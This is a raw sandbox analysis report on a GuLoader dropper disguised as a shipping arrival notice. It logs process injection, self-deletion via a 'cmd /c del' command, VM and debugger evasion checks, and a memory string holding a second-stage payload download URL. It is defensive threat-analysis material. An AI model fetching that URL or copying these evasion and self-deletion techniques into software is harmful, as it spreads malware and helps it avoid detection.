      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000000.927484403.0000000000448000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeVirustotal: Detection: 25%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeReversingLabs: Detection: 18%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@10/8
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_004064C4 push ebp; iretd
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0040A8F6 push esi; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00403171 push ds; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00404979 push esi; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00407B84 push es; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790749 push FFFFFF85h; retf
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078089F push 2FA9C30Eh; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007899BC push FFFFFF85h; retf 0805h
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E65D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_00574CB6 push ds; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048BD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817057 push ebx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081B059 push edx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0080E3F4 push edi; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0080E325 push edx; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00816B58 push ebp; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081E490 push cs; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00804556 push edi; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEA5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEF2 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CEFB push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817622 push FFFFFFC4h; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00817636 push ds; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0081CF5C push eax; ret
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: real checksum: 0x791f7 should be: 0x73bc1

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE2
      Self deletion via cmd deleteShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://WWW.PAULASSINKARCHITECT.NL/BIN_FDIYU115.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000008098E4 second address: 00000000008098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000809B4E second address: 0000000000809B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\explorer.exe TID: 5076Thread sleep count: 88 > 30
      Source: C:\Windows\explorer.exe TID: 5076Thread sleep time: -176000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790523 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSystem information queried: ModuleInformation
      Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: explorer.exe, 0000000D.00000000.1196380062.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWxL
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258621703.00000000009A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 0000000D.00000000.1213774669.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790523 rdtsc
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078752F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875F9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007918D3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791915 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FCF5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FCB7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078AD21 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785EAC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078EF53 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E694257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E638E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E618A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E623A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E648EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E69FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E61EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E60F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E604F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E604F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E63A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E62F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6C131B mov eax, dword ptr fs:[00000030h]
